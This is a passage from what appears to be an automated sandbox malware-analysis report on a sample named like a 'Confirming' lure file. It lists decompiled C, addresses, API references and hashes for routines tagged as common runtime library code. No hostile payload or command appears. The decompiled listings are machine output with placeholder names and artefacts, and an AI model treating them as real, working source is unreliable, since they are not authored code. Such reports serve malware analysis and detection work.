									} else {
										__eflags = _t140;
										if(_t140 != 0) {
											do {
												_t132 =  *_t140;
												_t140 = _t132;
												E00EA7188(_t140);
												__eflags = _t132;
											} while (_t132 != 0);
										}
										goto L21;
									}
								}
							} else {
								_t138 = 0x8007007a;
								goto L9;
							}
						} else {
							_t53 = E00EA12C0();
							goto L8;
						}
					}
				}
			}

0x00ea3790
0x00ea3790
0x00ea3799
0x00ea37a0
0x00ea37a3
0x00ea37a5
0x00ea37a8
0x00ea37a9
0x00ea37ab
0x00ea37c2
0x00ea37c9
0x00ea3830
0x00ea3830
0x00000000
0x00ea37cb
0x00ea37cb
0x00ea37d4
0x00ea37eb
0x00ea37eb
0x00ea37ef
0x00000000
0x00000000
0x00ea37d8
0x00ea37db
0x00ea37e2
0x00ea37e3
0x00ea37e8
0x00ea37e8
0x00ea37eb
0x00ea37f1
0x00ea37ff
0x00ea3803
0x00ea3832
0x00ea3838
0x00ea383d
0x00000000
0x00ea3805
0x00ea3805
0x00ea3811
0x00ea3816
0x00ea381b
0x00ea3821
0x00ea3829
0x00ea3856
0x00ea3858
0x00ea386d
0x00ea3874
0x00ea3876
0x00ea387c
0x00ea3881
0x00ea3884
0x00ea3886
0x00ea38e9
0x00ea38e9
0x00000000
0x00ea3888
0x00ea3888
0x00ea388e
0x00ea3894
0x00ea38ac
0x00ea38b3
0x00ea38b8
0x00ea3896
0x00ea3898
0x00ea389d
0x00ea389f
0x00000000
0x00ea38a1
0x00ea38a3
0x00ea38a8
0x00ea38a8
0x00ea389f
0x00ea38c2
0x00ea38d0
0x00ea38d2
0x00ea38d4
0x00ea38fa
0x00ea38ff
0x00ea3900
0x00ea3902
0x00ea391b
0x00ea391d
0x00ea3924
0x00ea392c
0x00ea3931
0x00ea394b
0x00ea3953
0x00ea3955
0x00ea397b
0x00ea3980
0x00ea3981
0x00ea3989
0x00ea3990
0x00ea3995
0x00ea3a58
0x00ea3a5d
0x00ea3a5e
0x00ea3a61
0x00ea3a62
0x00ea3a64
0x00ea3a6a
0x00ea3a6f
0x00ea3a73
0x00ea3a75
0x00ea3a78
0x00ea3a7e
0x00ea3a83
0x00ea399b
0x00ea399b
0x00ea399d
0x00ea39a5
0x00000000
0x00ea39a5
0x00ea3957
0x00ea3957
0x00ea3959
0x00ea395b
0x00ea395b
0x00ea395e
0x00ea3960
0x00ea3966
0x00ea3966
0x00ea395b
0x00ea396a
0x00000000
0x00ea396a
0x00ea3904
0x00ea390c
0x00ea390e
0x00000000
0x00ea3910
0x00ea3910
0x00ea39ab
0x00ea39ab
0x00ea39ac
0x00ea39b7
0x00ea39bd
0x00ea39bf
0x00ea39c1
0x00ea39e3
0x00ea39e4
0x00ea39ef
0x00ea39f5
0x00ea39f7
0x00ea39f9
0x00ea3a10
0x00ea3a14
0x00ea3a16
0x00ea3a17
0x00ea3a23
0x00ea3a2c
0x00ea3a25
0x00ea3a25
0x00ea3a25
0x00ea3a31
0x00ea3a33
0x00ea3a35
0x00ea3a37
0x00ea3a37
0x00ea3a3a
0x00ea3a3c
0x00ea3a42
0x00ea3a42
0x00ea3a37
0x00ea3a4c
0x00ea3a51
0x00ea39fb
0x00ea39fb
0x00ea39fd
0x00ea39ff
0x00ea39ff
0x00ea3a02
0x00ea3a04
0x00ea3a0a
0x00ea3a0a
0x00ea3a0e
0x00000000
0x00ea39fd
0x00ea39c3
0x00ea39c3
0x00ea39c5
0x00ea39c7
0x00ea39c7
0x00ea39ca
0x00ea39cc
0x00ea39d2
0x00ea39d2
0x00ea39c7
0x00ea39d6
0x00ea39d6
0x00000000
0x00ea39d6
0x00ea383f
0x00ea3845
0x00ea3846
0x00ea3847
0x00ea3853
0x00ea3853
0x00ea390e
0x00ea38d6
0x00ea38d6
0x00ea38d8
0x00ea38da
0x00ea38da
0x00ea38dd
0x00ea38df
0x00ea38e5
0x00ea38e5
0x00ea38da
0x00000000
0x00ea38d8
0x00ea38d4
0x00ea385a
0x00ea385a
0x00000000
0x00ea385a
0x00ea382b
0x00ea382b
0x00000000
0x00ea382b
0x00ea3829
0x00ea3803

APIs

Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5

GetModuleFileNameA.KERNEL32(00EA0000,?,00000104), ref: 00EA3821
_strlen.LIBCMT ref: 00EA3868
__alloca_probe_16.LIBCMT ref: 00EA38A3
GetModuleHandleA.KERNEL32(00000000,?), ref: 00EA3906

Strings

Module, xrefs: 00EA39AC
Module_Raw, xrefs: 00EA39E4

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: Module$CriticalErrorFileHandleInitializeLastNameSection__alloca_probe_16_strlen
String ID: Module$Module_Raw
API String ID: 1906531792-3885325121
Opcode ID: a7356d8f5c8bc592a090de83452ee7d3708592ac6149c2ecb785a4aaec91f556
Instruction ID: 0c8c66746b9aadcb7c182ccc10d3566f2b8870692ed8357ad3edf1edd2c59d16
Opcode Fuzzy Hash: a7356d8f5c8bc592a090de83452ee7d3708592ac6149c2ecb785a4aaec91f556
Instruction Fuzzy Hash: 2281F732A0112857DB259B64DC41AEB73E89F9E314F112196F949BF242DB74FF85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EA96F7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EA96F7(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xfe2b68 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xeb2648 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00EA8B48(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00EA8B48(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00ea9700
0x00ea97aa
0x00ea9708
0x00ea970a
0x00ea9711
0x00ea9713
0x00ea9719
0x00ea9726
0x00ea973b
0x00ea973f
0x00ea9791
0x00ea9791
0x00ea9796
0x00ea979a
0x00ea979d
0x00ea979d
0x00ea97a3
0x00ea97a5
0x00ea97ba
0x00ea97b5
0x00ea97b9
0x00ea97b9
0x00ea97a7
0x00ea97a7
0x00000000
0x00ea97a7
0x00ea9741
0x00ea974a
0x00ea9781
0x00ea9781
0x00ea9783
0x00ea9785
0x00000000
0x00000000
0x00ea978d
0x00000000
0x00ea978d
0x00ea9754
0x00ea9759
0x00ea975e
0x00000000
0x00000000
0x00ea9768
0x00ea976d
0x00ea9772
0x00000000
0x00000000
0x00ea9777
0x00ea977d
0x00000000
0x00ea977d
0x00ea971e
0x00000000
0x00000000
0x00000000
0x00ea9724
0x00ea97b3
0x00000000

Strings

ext-ms-, xrefs: 00EA9762
api-ms-, xrefs: 00EA974E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f78c7b616e787023244ac4a1a02176383cbe4abe298b7066c77dfa2e18ef4f56
Instruction ID: 2f9d91334e0020109fee72f66fb7b135f050f65ad1439bfc36954b91cef044b8
Opcode Fuzzy Hash: f78c7b616e787023244ac4a1a02176383cbe4abe298b7066c77dfa2e18ef4f56
Instruction Fuzzy Hash: 7B21D575E21221ABCB214F659C85A9B37989F4B764F212652FD16BF292DA30FD0086F0

Uniqueness

Uniqueness Score: -1.00%

Function 00EABD49 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EABD49(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00EABD11(_t45, 7);
					E00EABD11(_t45 + 0x1c, 7);
					E00EABD11(_t45 + 0x38, 0xc);
					E00EABD11(_t45 + 0x68, 0xc);
					E00EABD11(_t45 + 0x98, 2);
					E00EA8B82( *((intOrPtr*)(_t45 + 0xa0)));
					E00EA8B82( *((intOrPtr*)(_t45 + 0xa4)));
					E00EA8B82( *((intOrPtr*)(_t45 + 0xa8)));
					E00EABD11(_t45 + 0xb4, 7);
					E00EABD11(_t45 + 0xd0, 7);
					E00EABD11(_t45 + 0xec, 0xc);
					E00EABD11(_t45 + 0x11c, 0xc);
					E00EABD11(_t45 + 0x14c, 2);
					E00EA8B82( *((intOrPtr*)(_t45 + 0x154)));
					E00EA8B82( *((intOrPtr*)(_t45 + 0x158)));
					E00EA8B82( *((intOrPtr*)(_t45 + 0x15c)));
					return E00EA8B82( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00eabd4f
0x00eabd54
0x00eabd5d
0x00eabd68
0x00eabd73
0x00eabd7e
0x00eabd8c
0x00eabd97
0x00eabda2
0x00eabdad
0x00eabdbb
0x00eabdc9
0x00eabdda
0x00eabde8
0x00eabdf6
0x00eabe01
0x00eabe0c
0x00eabe17
0x00000000
0x00eabe27
0x00eabe2c

APIs

Part of subcall function 00EABD11: _free.LIBCMT ref: 00EABD36

_free.LIBCMT ref: 00EABD97

Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA

_free.LIBCMT ref: 00EABDA2
_free.LIBCMT ref: 00EABDAD
_free.LIBCMT ref: 00EABE01
_free.LIBCMT ref: 00EABE0C
_free.LIBCMT ref: 00EABE17
_free.LIBCMT ref: 00EABE22

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
Instruction ID: 9a86bbfdf6d8dd19d477b7bb07bfdf6014ce1c7f97ed159503066f5c4b99027a
Opcode Fuzzy Hash: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
Instruction Fuzzy Hash: F5112E71540B04AADA20BBB0DC47FCB77DCEF0A710F946819B29ABE053DB65BA049760

Uniqueness

Uniqueness Score: -1.00%

Function 00EA7C13 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00EA7C13(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xeb1278(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00ea7c19
0x00ea7c1d
0x00ea7c28
0x00ea7c30
0x00ea7c3b
0x00ea7c41
0x00ea7c45
0x00ea7c4c
0x00ea7c52
0x00ea7c52
0x00ea7c54
0x00ea7c59
0x00000000
0x00ea7c5e
0x00ea7c65

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EA7BC5,?,?,00EA7B8D,?,00000000,?), ref: 00EA7C28
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA7C3B
FreeLibrary.KERNEL32(00000000,?,?,00EA7BC5,?,?,00EA7B8D,?,00000000,?), ref: 00EA7C5E

Strings

mscoree.dll, xrefs: 00EA7C21
CorExitProcess, xrefs: 00EA7C33
"G, xrefs: 00EA7C4C

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: "G$CorExitProcess$mscoree.dll
API String ID: 4061214504-1533591495
Opcode ID: 1038748533392559141607945d0ec97ae4ef887678ce251eb47f8e7b3028c698
Instruction ID: d436fea94645a6ab479f369ada441b937e02462542c7ad348a7743b58d847860
Opcode Fuzzy Hash: 1038748533392559141607945d0ec97ae4ef887678ce251eb47f8e7b3028c698
Instruction Fuzzy Hash: B6F08230541218FFDB11AB51DD19BDFBB79EF08769F1012A4EA41B1160CB718F04DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAD4C5 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00EAD4C5(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0xeb9008; // 0x64e1d101
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E00EA70E3( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0xfe2960 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0xeb9760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0xfe2960 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E00EAC7FA( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xeb9760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0xfe2960 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00EA56D0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0xfe2960 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00EAC7FA( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00EAB146(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00EABE2D(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00EA8D4C( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E00EA8D4C();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00EA403C(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x00ead4d0
0x00ead4d7
0x00ead4da
0x00ead4e2
0x00ead4e5
0x00ead4f2
0x00ead4f5
0x00ead4f8
0x00ead4ff
0x00ead507
0x00ead50a
0x00ead50d
0x00ead513
0x00ead515
0x00ead51c
0x00ead526
0x00ead528
0x00ead52b
0x00ead52e
0x00ead531
0x00ead534
0x00ead537
0x00ead53d
0x00ead848
0x00ead848
0x00000000
0x00ead543
0x00ead54b
0x00ead54e
0x00ead554
0x00ead557
0x00ead55e
0x00ead565
0x00ead568
0x00000000
0x00000000
0x00ead571
0x00ead576
0x00ead578
0x00ead57b
0x00ead580
0x00ead584
0x00000000
0x00000000
0x00000000
0x00ead584
0x00ead589
0x00ead58b
0x00ead590
0x00ead64a
0x00ead651
0x00ead652
0x00ead655
0x00ead657
0x00ead7fb
0x00ead7fd
0x00000000
0x00ead7ff
0x00ead7ff
0x00ead802
0x00ead811
0x00ead815
0x00ead816
0x00ead816
0x00000000
0x00ead81a
0x00ead65d
0x00ead65f
0x00ead665
0x00ead668
0x00ead674
0x00ead67d
0x00ead688
0x00ead68d
0x00ead690
0x00ead693
0x00000000
0x00ead699
0x00ead699
0x00000000
0x00ead699
0x00ead693
0x00ead596
0x00ead5a5
0x00ead5a6
0x00ead5a9
0x00ead5ac
0x00ead5b1
0x00ead7c7
0x00ead7c9
0x00ead7cb
0x00ead7cd
0x00ead7d7
0x00ead7df
0x00ead7e1
0x00ead7e2
0x00ead7e6
0x00ead7e9
0x00ead7e9
0x00ead7ed
0x00ead7ed
0x00ead7ed
0x00ead7f0
0x00ead7f0
0x00ead7f0
0x00ead7f2
0x00ead7f2
0x00ead7f6
0x00ead5b7
0x00ead5b7
0x00ead5ba
0x00ead5bc
0x00ead5bf
0x00ead5c2
0x00ead5c6
0x00ead5c7
0x00ead5cb
0x00ead5ce
0x00ead5d3
0x00ead5dd
0x00ead5e2
0x00ead5e5
0x00ead5e8
0x00ead5e8
0x00ead5eb
0x00ead5ee
0x00ead5f0
0x00ead5f9
0x00ead5fd
0x00ead5fe
0x00ead602
0x00ead608
0x00ead611
0x00ead61e
0x00ead625
0x00ead629
0x00ead634
0x00ead639
0x00ead63f
0x00000000
0x00ead645
0x00ead69c
0x00ead69d
0x00ead720
0x00ead727
0x00ead72f
0x00ead737
0x00ead73c
0x00ead73f
0x00ead744
0x00000000
0x00ead74a
0x00ead75f
0x00ead83f
0x00ead845
0x00000000
0x00ead765
0x00ead76e
0x00ead770
0x00ead776
0x00000000
0x00ead77c
0x00ead780
0x00ead7b6
0x00ead7b9
0x00000000
0x00ead7bf
0x00ead7bf
0x00000000
0x00ead7bf
0x00ead782
0x00ead784
0x00ead786
0x00ead79f
0x00000000
0x00ead7a5
0x00ead7a9
0x00000000
0x00ead7af
0x00ead7af
0x00ead7b2
0x00ead7b3
0x00000000
0x00ead7b3
0x00ead7a9
0x00ead79f
0x00ead780
0x00ead776
0x00ead75f
0x00ead744
0x00ead63f
0x00ead5b1
0x00000000
0x00ead6a1
0x00ead6a1
0x00ead6a5
0x00ead6a8
0x00ead6ca
0x00ead6cd
0x00ead6d2
0x00ead6d6
0x00ead6da
0x00ead708
0x00ead70a
0x00000000
0x00ead6dc
0x00ead6dc
0x00ead6dc
0x00ead6df
0x00ead6e2
0x00ead6e5
0x00ead81c
0x00ead81f
0x00ead822
0x00ead82c
0x00ead837
0x00ead83c
0x00000000
0x00ead6eb
0x00ead6f2
0x00ead6f7
0x00ead6fa
0x00ead6fd
0x00000000
0x00ead703
0x00ead703
0x00000000
0x00ead703
0x00ead6fd
0x00ead6e5
0x00ead6aa
0x00ead6ae
0x00ead6b1
0x00ead6b6
0x00ead6bc
0x00ead6be
0x00ead6c5
0x00ead70b
0x00ead70e
0x00ead70f
0x00ead714
0x00ead717
0x00ead71a
0x00000000
